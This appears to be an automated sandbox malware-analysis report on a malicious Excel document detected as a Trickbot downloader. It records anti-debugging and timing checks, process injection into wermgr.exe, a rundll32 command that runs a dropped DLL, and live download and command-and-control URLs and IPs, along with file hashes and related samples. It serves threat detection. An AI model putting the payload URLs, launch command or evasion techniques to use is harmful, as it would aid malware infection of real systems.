                Source: C:\Windows\System32\wermgr.exeRDTSC instruction interceptor: First address: 000000000006EAD0 second address: 000000000006EAD0 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 ret 0x0000000a dec esp 0x0000000b mov edi, eax 0x0000000d call dword ptr [0000E3AEh] 0x00000013 jmp 00007F61D886BE10h 0x00000015 jmp dword ptr [0007C47Ah] 0x0000001b mov ecx, dword ptr [7FFE0004h] 0x00000022 dec eax 0x00000023 mov eax, dword ptr [7FFE0320h] 0x0000002a dec eax 0x0000002b imul eax, ecx 0x0000002e dec eax 0x0000002f shr eax, 18h 0x00000032 ret 0x00000033 inc esp 0x00000034 mov esi, eax 0x00000036 dec ecx 0x00000037 mov esi, edi 0x00000039 dec eax 0x0000003a xor esi, FFFFFF00h 0x00000040 dec ecx 0x00000041 and esi, edi 0x00000043 call 00007F61D8863CA6h 0x00000048 rdtsc
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0006EAD0 rdtsc
                Source: C:\Windows\System32\wermgr.exeCode function: GetAdaptersInfo,
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\8[1].jjkesJump to dropped file
                Source: C:\Windows\System32\wermgr.exeLast function: Thread delayed
                Source: C:\Windows\System32\wermgr.exeLast function: Thread delayed
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00061290 FindFirstFileW,
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000646F0 FindFirstFileW,FindNextFileW,
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0006EAD0 rdtsc
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00073070 LdrLoadDll,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E89B044 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E89B044 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E897DE5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00082060 SetTimer,RtlAddVectoredExceptionHandler,

                HIPS / PFW / Operating System Protection Evasion:

                barindex
                Allocates memory in foreign processesShow sources
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\wermgr.exe base: 60000 protect: page execute and read and write
                Writes to foreign memory regionsShow sources
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\wermgr.exe base: 60000
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\wermgr.exe base: FFE493F8
                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: wermgr.exe, 00000006.00000002.2356139570.0000000000750000.00000002.00000001.sdmpBinary or memory string: Program Manager
                Source: wermgr.exe, 00000006.00000002.2356139570.0000000000750000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                Source: wermgr.exe, 00000006.00000002.2356139570.0000000000750000.00000002.00000001.sdmpBinary or memory string: !Progman
                Source: C:\Windows\System32\wermgr.exeQueries volume information: C:\ VolumeInformation

                Stealing of Sensitive Information:

                barindex
                Yara detected TrickbotShow sources
                Source: Yara matchFile source: 00000004.00000003.2087111126.0000000000374000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.2087119613.0000000000374000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2091202267.0000000000340000.00000004.00000020.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2091126228.0000000000270000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2091382187.0000000000968000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 4.2.rundll32.exe.270000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.270000.1.unpack, type: UNPACKEDPE

                Remote Access Functionality:

                barindex
                Yara detected TrickbotShow sources
                Source: Yara matchFile source: 00000004.00000003.2087111126.0000000000374000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.2087119613.0000000000374000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2091202267.0000000000340000.00000004.00000020.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2091126228.0000000000270000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2091382187.0000000000968000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 4.2.rundll32.exe.270000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.270000.1.unpack, type: UNPACKEDPE

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsScripting21Path InterceptionAccess Token Manipulation1Masquerading121OS Credential DumpingSecurity Software Discovery12Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel22Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsNative API1Boot or Logon Initialization ScriptsProcess Injection212Disable or Modify Tools2LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsExploitation for Client Execution33Logon Script (Windows)Extra Window Memory Injection1Access Token Manipulation1Security Account ManagerSystem Network Configuration Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection212NTDSFile and Directory Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsSystem Information Discovery113SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information2Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsRundll321DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobExtra Window Memory Injection1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                SecuriteInfo.com.Exploit.Siggen3.10350.12632.xls26%ReversingLabsDocument-Word.Downloader.EncDoc

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\8[1].jjkes6%ReversingLabsWin32.Trojan.Trickpak
                C:\Users\user\BASE.BABAA6%ReversingLabsWin32.Trojan.Trickpak

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.icra.org/vocabulary/.0%URL Reputationsafe
                http://www.icra.org/vocabulary/.0%URL Reputationsafe
                http://www.icra.org/vocabulary/.0%URL Reputationsafe
                https://200.52.147.93/rob60/377142_W617601.BB951803A213771AABBDF5CE6FB77EC0/5/file/=0%Avira URL Cloudsafe
                http://www.chipmania.it/mails/open.php100%Avira URL Cloudmalware
                http://www.%s.comPA0%URL Reputationsafe
                http://www.%s.comPA0%URL Reputationsafe
                http://www.%s.comPA0%URL Reputationsafe
                http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                http://servername/isapibackend.dll0%Avira URL Cloudsafe
                https://200.52.147.93/rob60/377142_W617601.BB951803A213771AABBDF5CE6FB77EC0/5/file/0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                chipmania.it
                185.81.0.78
                truefalse
                  unknown
                  www.chipmania.it
                  unknown
                  unknownfalse
                    unknown
                    api.ip.sb
                    unknown
                    unknownfalse
                      unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://www.chipmania.it/mails/open.phptrue
                      • Avira URL Cloud: malware
                      unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000003.00000002.2093209344.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2091598898.0000000002497000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2361796624.0000000033BA7000.00000002.00000001.sdmpfalse
                        high
                        http://www.windows.com/pctv.wermgr.exe, 00000006.00000002.2361569025.00000000339C0000.00000002.00000001.sdmpfalse
                          high
                          http://investor.msn.comrundll32.exe, 00000003.00000002.2092708829.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2091417672.00000000022B0000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2361569025.00000000339C0000.00000002.00000001.sdmpfalse
                            high
                            http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000003.00000002.2092708829.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2091417672.00000000022B0000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2361569025.00000000339C0000.00000002.00000001.sdmpfalse
                              high
                              http://www.icra.org/vocabulary/.rundll32.exe, 00000003.00000002.2093209344.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2091598898.0000000002497000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2361796624.0000000033BA7000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.wermgr.exe, 00000006.00000002.2361153381.00000000335D0000.00000002.00000001.sdmpfalse
                                high
                                https://200.52.147.93/rob60/377142_W617601.BB951803A213771AABBDF5CE6FB77EC0/5/file/=wermgr.exe, 00000006.00000002.2356089312.000000000026E000.00000004.00000020.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://investor.msn.com/rundll32.exe, 00000003.00000002.2092708829.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2091417672.00000000022B0000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2361569025.00000000339C0000.00000002.00000001.sdmpfalse
                                  high
                                  http://www.%s.comPAwermgr.exe, 00000006.00000002.2361153381.00000000335D0000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  low
                                  http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000003.00000002.2093209344.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2091598898.0000000002497000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2361796624.0000000033BA7000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.hotmail.com/oerundll32.exe, 00000003.00000002.2092708829.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2091417672.00000000022B0000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2361569025.00000000339C0000.00000002.00000001.sdmpfalse
                                    high
                                    http://servername/isapibackend.dllwermgr.exe, 00000006.00000002.2362129186.00000000341A0000.00000002.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    low
                                    https://200.52.147.93/rob60/377142_W617601.BB951803A213771AABBDF5CE6FB77EC0/5/file/wermgr.exe, 00000006.00000002.2356089312.000000000026E000.00000004.00000020.sdmp, wermgr.exe, 00000006.00000002.2356106081.000000000029A000.00000004.00000020.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown

                                    Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public

                                    IPDomainCountryFlagASNASN NameMalicious
                                    185.81.0.78
                                    unknownItaly
                                    52030SERVERPLAN-ASITfalse
                                    200.52.147.93
                                    unknownHonduras
                                    27932RedesyTelecomunicacionesHNtrue

                                    General Information

                                    Joe Sandbox Version:31.0.0 Emerald
                                    Analysis ID:355602
                                    Start date:20.02.2021
                                    Start time:02:15:52
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 6m 43s
                                    Hypervisor based Inspection enabled:false
                                    Report type:light
                                    Sample file name:SecuriteInfo.com.Exploit.Siggen3.10350.12632.7055 (renamed file extension from 7055 to xls)
                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                    Number of analysed new started processes analysed:8
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.expl.evad.winXLS@9/7@3/2
                                    EGA Information:Failed
                                    HDC Information:
                                    • Successful, ratio: 12.3% (good quality ratio 7.7%)
                                    • Quality average: 58.5%
                                    • Quality standard deviation: 46.4%
                                    HCA Information:Failed
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                    • Attach to Office via COM
                                    • Scroll down
                                    • Close Viewer
                                    Warnings:
                                    Show All
                                    • Exclude process from analysis (whitelisted): dllhost.exe
                                    • TCP Packets have been reduced to 100
                                    • Excluded IPs from analysis (whitelisted): 205.185.216.10, 205.185.216.42, 172.67.75.172, 104.26.12.31, 104.26.13.31
                                    • Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, au-bg-shim.trafficmanager.net
                                    • VT rate limit hit for: /opt/package/joesandbox/database/analysis/355602/sample/SecuriteInfo.com.Exploit.Siggen3.10350.12632.xls

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    02:16:42API Interceptor1x Sleep call for process: rundll32.exe modified
                                    02:16:42API Interceptor8x Sleep call for process: wermgr.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    185.81.0.78SecuriteInfo.com.Exploit.Siggen3.10350.20211.xlsGet hashmaliciousBrowse
                                    • www.chipmania.it/mails/open.php
                                    SecuriteInfo.com.Exploit.Siggen3.10350.27303.xlsGet hashmaliciousBrowse
                                    • www.chipmania.it/mails/open.php
                                    SecuriteInfo.com.Exploit.Siggen3.10350.24644.xlsGet hashmaliciousBrowse
                                    • www.chipmania.it/mails/open.php
                                    SecuriteInfo.com.Exploit.Siggen3.10350.15803.xlsGet hashmaliciousBrowse
                                    • www.chipmania.it/mails/open.php
                                    SecuriteInfo.com.Exploit.Siggen3.10350.27303.xlsGet hashmaliciousBrowse
                                    • www.chipmania.it/mails/open.php
                                    SecuriteInfo.com.Exploit.Siggen3.10350.26515.xlsGet hashmaliciousBrowse
                                    • www.chipmania.it/mails/open.php
                                    SecuriteInfo.com.Exploit.Siggen3.10350.31033.xlsGet hashmaliciousBrowse
                                    • www.chipmania.it/mails/open.php
                                    SecuriteInfo.com.Heur.1476.xlsGet hashmaliciousBrowse
                                    • www.chipmania.it/mails/open.php
                                    SecuriteInfo.com.Heur.1181.xlsGet hashmaliciousBrowse
                                    • www.chipmania.it/mails/open.php
                                    SecuriteInfo.com.Heur.21235.xlsGet hashmaliciousBrowse
                                    • www.chipmania.it/mails/open.php
                                    SecuriteInfo.com.Heur.15875.xlsGet hashmaliciousBrowse
                                    • www.chipmania.it/mails/open.php
                                    SecuriteInfo.com.Heur.21759.xlsGet hashmaliciousBrowse
                                    • www.chipmania.it/mails/open.php
                                    SecuriteInfo.com.Heur.2804.xlsGet hashmaliciousBrowse
                                    • www.chipmania.it/mails/open.php
                                    SecuriteInfo.com.Heur.1138.xlsGet hashmaliciousBrowse
                                    • www.chipmania.it/mails/open.php
                                    SecuriteInfo.com.Heur.11266.xlsGet hashmaliciousBrowse
                                    • www.chipmania.it/mails/open.php
                                    SecuriteInfo.com.Heur.18554.xlsGet hashmaliciousBrowse
                                    • www.chipmania.it/mails/open.php
                                    Sign-636.xlsGet hashmaliciousBrowse
                                    • www.chipmania.it/mails/open.php
                                    Sign-92793351_1597657581.xlsGet hashmaliciousBrowse
                                    • www.chipmania.it/mails/open.php
                                    Sign-979329054_1327186231.xlsGet hashmaliciousBrowse
                                    • www.chipmania.it/mails/open.php
                                    Sign-709986424_219667767.xlsGet hashmaliciousBrowse
                                    • www.chipmania.it/mails/open.php
                                    200.52.147.93SecuriteInfo.com.Exploit.Siggen3.10350.20211.xlsGet hashmaliciousBrowse
                                      SecuriteInfo.com.Exploit.Siggen3.10350.26515.xlsGet hashmaliciousBrowse
                                        SecuriteInfo.com.Heur.1181.xlsGet hashmaliciousBrowse
                                          SecuriteInfo.com.Heur.1138.xlsGet hashmaliciousBrowse
                                            Sign-92793351_1597657581.xlsGet hashmaliciousBrowse
                                              Sign-707465831_1420670581.xlsGet hashmaliciousBrowse
                                                SecuriteInfo.com.Heur.22173.xlsGet hashmaliciousBrowse
                                                  Sign_77624265-298090224.xlsGet hashmaliciousBrowse
                                                    SecuriteInfo.com.Exploit.Siggen3.10048.24657.xlsGet hashmaliciousBrowse
                                                      SecuriteInfo.com.Exploit.Siggen3.10048.18756.xlsGet hashmaliciousBrowse
                                                        SecuriteInfo.com.Heur.30904.xlsGet hashmaliciousBrowse
                                                          P4fZLHrU6d.exeGet hashmaliciousBrowse

                                                            Domains

                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                                                            ASN

                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                            RedesyTelecomunicacionesHNSecuriteInfo.com.Exploit.Siggen3.10350.20211.xlsGet hashmaliciousBrowse
                                                            • 200.52.147.93
                                                            SecuriteInfo.com.Exploit.Siggen3.10350.26515.xlsGet hashmaliciousBrowse
                                                            • 200.52.147.93
                                                            SecuriteInfo.com.Heur.1181.xlsGet hashmaliciousBrowse
                                                            • 200.52.147.93
                                                            SecuriteInfo.com.Heur.1138.xlsGet hashmaliciousBrowse
                                                            • 200.52.147.93
                                                            Sign-92793351_1597657581.xlsGet hashmaliciousBrowse
                                                            • 200.52.147.93
                                                            Sign-707465831_1420670581.xlsGet hashmaliciousBrowse
                                                            • 200.52.147.93
                                                            SecuriteInfo.com.Heur.22173.xlsGet hashmaliciousBrowse
                                                            • 200.52.147.93
                                                            Sign_77624265-298090224.xlsGet hashmaliciousBrowse
                                                            • 200.52.147.93
                                                            SecuriteInfo.com.Exploit.Siggen3.10048.24657.xlsGet hashmaliciousBrowse
                                                            • 200.52.147.93
                                                            SecuriteInfo.com.Exploit.Siggen3.10048.18756.xlsGet hashmaliciousBrowse
                                                            • 200.52.147.93
                                                            SecuriteInfo.com.Heur.30904.xlsGet hashmaliciousBrowse
                                                            • 200.52.147.93
                                                            P4fZLHrU6d.exeGet hashmaliciousBrowse
                                                            • 200.52.147.93
                                                            SERVERPLAN-ASITSecuriteInfo.com.Exploit.Siggen3.10350.20211.xlsGet hashmaliciousBrowse
                                                            • 185.81.0.78
                                                            SecuriteInfo.com.Exploit.Siggen3.10350.27303.xlsGet hashmaliciousBrowse
                                                            • 185.81.0.78
                                                            SecuriteInfo.com.Exploit.Siggen3.10350.24644.xlsGet hashmaliciousBrowse
                                                            • 185.81.0.78
                                                            SecuriteInfo.com.Exploit.Siggen3.10350.15803.xlsGet hashmaliciousBrowse
                                                            • 185.81.0.78
                                                            SecuriteInfo.com.Exploit.Siggen3.10350.27303.xlsGet hashmaliciousBrowse
                                                            • 185.81.0.78
                                                            SecuriteInfo.com.Exploit.Siggen3.10350.26515.xlsGet hashmaliciousBrowse
                                                            • 185.81.0.78
                                                            SecuriteInfo.com.Exploit.Siggen3.10350.31033.xlsGet hashmaliciousBrowse
                                                            • 185.81.0.78
                                                            SecuriteInfo.com.Heur.1476.xlsGet hashmaliciousBrowse
                                                            • 185.81.0.78
                                                            SecuriteInfo.com.Heur.1181.xlsGet hashmaliciousBrowse
                                                            • 185.81.0.78
                                                            SecuriteInfo.com.Heur.21235.xlsGet hashmaliciousBrowse
                                                            • 185.81.0.78
                                                            SecuriteInfo.com.Heur.15875.xlsGet hashmaliciousBrowse
                                                            • 185.81.0.78
                                                            SecuriteInfo.com.Heur.21759.xlsGet hashmaliciousBrowse
                                                            • 185.81.0.78
                                                            SecuriteInfo.com.Heur.2804.xlsGet hashmaliciousBrowse
                                                            • 185.81.0.78
                                                            SecuriteInfo.com.Heur.1138.xlsGet hashmaliciousBrowse
                                                            • 185.81.0.78
                                                            SecuriteInfo.com.Heur.11266.xlsGet hashmaliciousBrowse
                                                            • 185.81.0.78
                                                            SecuriteInfo.com.Heur.18554.xlsGet hashmaliciousBrowse
                                                            • 185.81.0.78
                                                            Sign-636.xlsGet hashmaliciousBrowse
                                                            • 185.81.0.78
                                                            Sign-92793351_1597657581.xlsGet hashmaliciousBrowse
                                                            • 185.81.0.78
                                                            Sign-979329054_1327186231.xlsGet hashmaliciousBrowse
                                                            • 185.81.0.78
                                                            Sign-709986424_219667767.xlsGet hashmaliciousBrowse
                                                            • 185.81.0.78

                                                            JA3 Fingerprints

                                                            No context

                                                            Dropped Files

                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\8[1].jjkesSecuriteInfo.com.Exploit.Siggen3.10350.20211.xlsGet hashmaliciousBrowse
                                                              SecuriteInfo.com.Exploit.Siggen3.10350.27303.xlsGet hashmaliciousBrowse
                                                                SecuriteInfo.com.Exploit.Siggen3.10350.24644.xlsGet hashmaliciousBrowse
                                                                  SecuriteInfo.com.Exploit.Siggen3.10350.15803.xlsGet hashmaliciousBrowse
                                                                    SecuriteInfo.com.Exploit.Siggen3.10350.26515.xlsGet hashmaliciousBrowse
                                                                      SecuriteInfo.com.Exploit.Siggen3.10350.31033.xlsGet hashmaliciousBrowse
                                                                        SecuriteInfo.com.Heur.1476.xlsGet hashmaliciousBrowse
                                                                          SecuriteInfo.com.Heur.1181.xlsGet hashmaliciousBrowse
                                                                            SecuriteInfo.com.Heur.21235.xlsGet hashmaliciousBrowse
                                                                              SecuriteInfo.com.Heur.15875.xlsGet hashmaliciousBrowse
                                                                                SecuriteInfo.com.Heur.21759.xlsGet hashmaliciousBrowse
                                                                                  SecuriteInfo.com.Heur.2804.xlsGet hashmaliciousBrowse
                                                                                    SecuriteInfo.com.Heur.1138.xlsGet hashmaliciousBrowse
                                                                                      SecuriteInfo.com.Heur.11266.xlsGet hashmaliciousBrowse
                                                                                        SecuriteInfo.com.Heur.18554.xlsGet hashmaliciousBrowse
                                                                                          Sign-636.xlsGet hashmaliciousBrowse
                                                                                            Sign-92793351_1597657581.xlsGet hashmaliciousBrowse
                                                                                              Sign-979329054_1327186231.xlsGet hashmaliciousBrowse
                                                                                                Sign-709986424_219667767.xlsGet hashmaliciousBrowse
                                                                                                  Sign-488964532_2104982999.xlsGet hashmaliciousBrowse
                                                                                                    C:\Users\user\BASE.BABAASecuriteInfo.com.Exploit.Siggen3.10350.20211.xlsGet hashmaliciousBrowse
                                                                                                      SecuriteInfo.com.Exploit.Siggen3.10350.27303.xlsGet hashmaliciousBrowse
                                                                                                        SecuriteInfo.com.Exploit.Siggen3.10350.24644.xlsGet hashmaliciousBrowse
                                                                                                          SecuriteInfo.com.Exploit.Siggen3.10350.15803.xlsGet hashmaliciousBrowse
                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10350.26515.xlsGet hashmaliciousBrowse
                                                                                                              SecuriteInfo.com.Exploit.Siggen3.10350.31033.xlsGet hashmaliciousBrowse
                                                                                                                SecuriteInfo.com.Heur.1476.xlsGet hashmaliciousBrowse
                                                                                                                  SecuriteInfo.com.Heur.1181.xlsGet hashmaliciousBrowse
                                                                                                                    SecuriteInfo.com.Heur.21235.xlsGet hashmaliciousBrowse
                                                                                                                      SecuriteInfo.com.Heur.15875.xlsGet hashmaliciousBrowse
                                                                                                                        SecuriteInfo.com.Heur.21759.xlsGet hashmaliciousBrowse
                                                                                                                          SecuriteInfo.com.Heur.2804.xlsGet hashmaliciousBrowse
                                                                                                                            SecuriteInfo.com.Heur.1138.xlsGet hashmaliciousBrowse
                                                                                                                              SecuriteInfo.com.Heur.11266.xlsGet hashmaliciousBrowse
                                                                                                                                SecuriteInfo.com.Heur.18554.xlsGet hashmaliciousBrowse
                                                                                                                                  Sign-636.xlsGet hashmaliciousBrowse
                                                                                                                                    Sign-92793351_1597657581.xlsGet hashmaliciousBrowse
                                                                                                                                      Sign-979329054_1327186231.xlsGet hashmaliciousBrowse
                                                                                                                                        Sign-709986424_219667767.xlsGet hashmaliciousBrowse
                                                                                                                                          Sign-488964532_2104982999.xlsGet hashmaliciousBrowse

                                                                                                                                            Created / dropped Files

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\8[1].jjkes
                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):4591104
                                                                                                                                            Entropy (8bit):5.0540147937501265
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:49152:7SkyvIo/YMOZswCkQzvhtawebv5hW2/yF//4VPQw:NCetO//S9
                                                                                                                                            MD5:25056DF6D3546DE971EAFE5DA5F9AE44
                                                                                                                                            SHA1:179555B3D0391E45DF29E651B8ED0342D02FE88A
                                                                                                                                            SHA-256:AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB
                                                                                                                                            SHA-512:8032A5BD9B07ACCC290B24FD2AFA299AFD12214026089665836FADE7282F0D217FFD79F5A3A12FD64E0E08D4F6FA0A04A8B036B4CDC1F95356B0BF43D6A80B50
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 6%
                                                                                                                                            Joe Sandbox View:
                                                                                                                                            • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.20211.xls, Detection: malicious, Browse
                                                                                                                                            • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls, Detection: malicious, Browse
                                                                                                                                            • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.24644.xls, Detection: malicious, Browse
                                                                                                                                            • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls, Detection: malicious, Browse
                                                                                                                                            • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.26515.xls, Detection: malicious, Browse
                                                                                                                                            • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.31033.xls, Detection: malicious, Browse
                                                                                                                                            • Filename: SecuriteInfo.com.Heur.1476.xls, Detection: malicious, Browse
                                                                                                                                            • Filename: SecuriteInfo.com.Heur.1181.xls, Detection: malicious, Browse
                                                                                                                                            • Filename: SecuriteInfo.com.Heur.21235.xls, Detection: malicious, Browse
                                                                                                                                            • Filename: SecuriteInfo.com.Heur.15875.xls, Detection: malicious, Browse
                                                                                                                                            • Filename: SecuriteInfo.com.Heur.21759.xls, Detection: malicious, Browse
